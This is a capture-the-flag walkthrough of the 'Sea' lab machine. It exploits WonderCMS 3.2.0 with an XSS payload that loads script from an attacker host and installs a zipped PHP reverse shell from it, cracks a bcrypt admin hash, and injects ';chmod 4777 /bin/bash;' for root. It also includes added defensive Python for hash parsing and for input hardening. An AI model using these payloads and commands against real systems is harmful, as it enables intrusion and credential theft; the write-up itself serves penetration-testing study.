Sea

OS: Linux
Difficulty: Easy
Points: 20

Nmap Scan

nmap -v -p- --min-rate=5000 10.129.236.229
nmap -p 22,80 -sV -sC -oN nmap.txt 10.129.236.229
Nmap scan report for 10.129.236.229
Host is up (0.028s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
|   256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_  256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Sea - Home
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Enumeration

We enumerate the web application's directories.

gobuster dir -u http://10.129.236.229/ -w /usr/share/wordlists/dirb/big.txt -t 20
/0                    (Status: 200) [Size: 3685]
/404                  (Status: 200) [Size: 3376]
/data                 (Status: 301) [Size: 235] [--> http://10.129.236.229/data/]
/home                 (Status: 200) [Size: 3685]
/messages             (Status: 301) [Size: 239] [--> http://10.129.236.229/messages/]
/plugins              (Status: 301) [Size: 238] [--> http://10.129.236.229/plugins/]
/themes               (Status: 301) [Size: 237] [--> http://10.129.236.229/themes/]
gobuster dir -u http://10.129.236.229/themes/ -w /usr/share/wordlists/dirb/big.txt -t 20
/.htaccess            (Status: 403) [Size: 199]
/.htpasswd            (Status: 403) [Size: 199]
/404                  (Status: 200) [Size: 3376]
/Documents and Settings (Status: 403) [Size: 199]
/Program Files        (Status: 403) [Size: 199]
/bike                 (Status: 301) [Size: 242] [--> http://10.129.236.229/themes/bike/]
/contact us           (Status: 403) [Size: 199]
/donate cash          (Status: 403) [Size: 199]
gobuster dir -u http://10.129.236.229/themes/bike/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt -t 20
/admin/home           (Status: 200) [Size: 3685]
/LICENSE              (Status: 200) [Size: 1067]
/README.md            (Status: 200) [Size: 318]
/sym/root/home/       (Status: 200) [Size: 3685]
/version              (Status: 200) [Size: 6]

We find a README.md file that names the technology in use.

┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/README.md
# WonderCMS bike theme

## Description
Includes animations.

## Author: turboblack

## Preview
![Theme preview](/preview.jpg)

## How to use
1. Login to your WonderCMS website.
2. Click "Settings" and click "Themes".
3. Find theme in the list and click "install".
4. In the "General" tab, select theme to activate it.

We also locate the version.

┌──(root㉿kali)-[~/Sea]
└─# curl http://sea.htb/themes/bike/version  
3.2.0

WonderCMS 3.2.0 (RCE)

We find the following exploit (linked in the References) to obtain RCE.

For the script to work, we need to make a few changes.

#var urlWithoutLog = url.split("/").slice(0, -1).join("/");
var urlWithoutLogBase = "http://sea.htb";
...
...
var urlRev = urlWithoutLogBase+"/?installModule=http://10.10.14.50/shell.zip&directoryName=violet&type=themes&token=" + token;
...
...
xhr4.open("GET", urlWithoutLogBase+"/themes/shell/rev.php");
...
...
xhr5.open("GET", urlWithoutLogBase+"/themes/shell/rev.php?lhost=" + ip + "&lport=" + port); 
...
...
http://sea.htb/index.php?page=loginURL?"></form><script src="http://10.10.14.50/xss.js"></script><form action="
...
...
XSSlink = str(sys.argv[1]).replace("loginURL","index.php?page=loginURL?")+"\"></form><script+src=\"http://"+str(sys.argv[2])+"/xss.js\"></script><form+action=\""
...
...
os.system("python3 -m http.server 80\n")

Now we create the zip file that will contain the reverse shell.

┌──(root㉿kali)-[~/Sea]
└─# mkdir shell

┌──(root㉿kali)-[~/Sea]
└─# cp /usr/share/webshells/php/php-reverse-shell.php shell/rev.php

We set our IP (and listening port) in the file.

$ip = '10.10.14.50';  // CHANGE THIS
$port = 1234;       // CHANGE THIS

We create the zip.

┌──(root㉿kali)-[~/Sea]
└─# zip -r shell.zip shell/
  adding: shell/ (stored 0%)
  adding: shell/rev.php (deflated 59%)

We run the script.

python3 exploit.py 'http://sea.htb/loginURL' 10.10.14.50 1234

We submit our payload through the contact form, in the Website field.

http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.50/xss.js"></script><form+action="

After a moment, we get our reverse shell.

Lateral Movement

We find a hash at the following path.

www-data@sea:/var/www/sea/data$ cat database.js 
{
    "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "defaultPage": "home",
        "login": "loginURL",
        "forceLogout": false,
        "forceHttps": false,
        "saveChangesPopup": false,
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q",

The hash can be cracked, but first the backslashes must be removed: the JSON file stores each forward slash escaped as \/.

$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q
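As an added example (not part of the original writeup), the following Python reads the database.js content with the json module, which decodes the \/ escapes on its own, and then checks that the result has the bcrypt layout john reported. The JSON text below is a constructed excerpt that keeps only the fields needed here.

```python
import json
import re

# Constructed excerpt modelled on the database.js shown above. JSON encoders may
# escape "/" as "\/", which is why the hash looks wrong when read straight from the file.
DATABASE_JS = r'''{
    "config": {
        "siteTitle": "Sea",
        "theme": "bike",
        "login": "loginURL",
        "password": "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ\/D.GuE4jRIikYiWrD3TM\/PjDnXm4q"
    }
}'''

# bcrypt modular crypt format: $2a$/$2b$/$2y$, a two-digit cost, then 22 salt + 31 hash chars
BCRYPT_RE = re.compile(r"^\$2[aby]\$(\d{2})\$[./A-Za-z0-9]{53}$")


def extract_password_hash(raw_json):
    """Parse the WonderCMS database and return the admin password hash.

    json.loads() turns every "\/" back into "/", so no manual backslash removal is needed.
    """
    data = json.loads(raw_json)
    return data["config"]["password"]


def parse_bcrypt(h):
    """Return (variant, cost) for a bcrypt hash, or raise ValueError if it is not one."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash: %r" % h)
    return h[1:3], int(m.group(1))


if __name__ == "__main__":
    h = extract_password_hash(DATABASE_JS)
    print(h)                # plain "/" again, ready to be written to hash.txt
    print(parse_bcrypt(h))  # ('2y', 10): cost 10 means 2^10 = 1024 rounds
```

The parsed cost of 10 matches the "Cost 1 (iteration count) is 1024" line john prints, which is a quick sanity check that the hash was copied intact.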

We crack the hash and obtain the password.

┌──(root㉿kali)-[~/Sea]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X2])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
mychemicalromance (?)     
1g 0:00:00:42 DONE (2024-08-12 08:48) 0.02348g/s 71.86p/s 71.86c/s 71.86C/s chaparra..memories
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

We connect over SSH.

┌──(root㉿kali)-[~/Sea]
└─# ssh amay@sea.htb
amay@sea.htb's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-190-generic x86_64)

Last login: Mon Aug 12 12:50:20 2024 from 10.10.14.50
amay@sea:~$ id
uid=1000(amay) gid=1000(amay) groups=1000(amay)

Privilege Escalation

We see port 8080 listening on localhost only.

amay@sea:~$ netstat -putona
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name     Timer
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -                    off (0.00/0/0)
tcp        0      0 127.0.0.1:8080          0.0.0.0:*               LISTEN      -                    off (0.00/0/0)

We forward that port to our machine.

ssh amay@sea.htb -L 8888:127.0.0.1:8080

An authentication prompt appears; the same credentials work.

amay : mychemicalromance

Testing the web application, we find a command injection in the following form.

log_file=;id;test&analyze_log=
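Added example (not code from the writeup or from the application on the box): the log-analysis endpoint was not shown, so the handlers below are a hypothetical reconstruction of the pattern that makes ;id; run, placed beside a hardened version that allowlists the file name and passes it as a single argv element. The last function parses a POST body and flags fields carrying shell metacharacters, which is the kind of check a request log or WAF rule would apply.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Hypothetical settings for the reconstructed endpoint.
LOG_DIR = "/var/log"
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]*$")     # plain file name only
SHELL_META = re.compile(r"[;&|`$(){}<>\n\\]")                # characters a shell interprets


def vulnerable_command(log_file):
    """The bug class seen on the box: the parameter is spliced into a shell string."""
    return "cat " + log_file + " | grep -c ERROR"


def validate_log_file(log_file):
    """Allowlist the value: no separators, no metacharacters, no path components."""
    if not SAFE_NAME.match(log_file):
        raise ValueError("rejected log_file value: %r" % log_file)
    return LOG_DIR + "/" + log_file


def hardened_command(log_file):
    """argv list with no shell: the value is one argument whatever it contains."""
    return ["grep", "-c", "ERROR", validate_log_file(log_file)]


def run_hardened(log_file):
    return subprocess.run(hardened_command(log_file), capture_output=True, text=True)


def parse_form(body):
    """Minimal application/x-www-form-urlencoded parser (splits on '&' only)."""
    fields = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields


def injection_suspects(body):
    """Return the form fields whose values contain shell metacharacters."""
    return {k: v for k, v in parse_form(body).items() if SHELL_META.search(v)}


if __name__ == "__main__":
    body = "log_file=;id;test&analyze_log="        # the request body from the writeup
    print(injection_suspects(body))                 # {'log_file': ';id;test'}
    print(vulnerable_command(";id;test"))           # cat ;id;test | grep -c ERROR
    try:
        hardened_command(";id;test")
    except ValueError as e:
        print("blocked:", e)
    print(hardened_command("access.log"))           # ['grep', '-c', 'ERROR', '/var/log/access.log']
```

The allowlist also rejects traversal values such as ../../etc/passwd, because "/" is not in the permitted character set.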

From here there are several options; we set the SUID bit on the bash binary to escalate privileges.

log_file=;chmod 4777 /bin/bash;test&analyze_log=

Now, from the terminal, we can become root.

amay@sea:~$ /bin/bash -p
bash-5.0# id
uid=1000(amay) gid=1000(amay) euid=0(root) groups=1000(amay)
bash-5.0# cat /root/root.txt
3e050709de4f9b9c0c5affc3e5901a23
bash-5.0#

References

https://github.com/prodigiousMind/CVE-2023-41425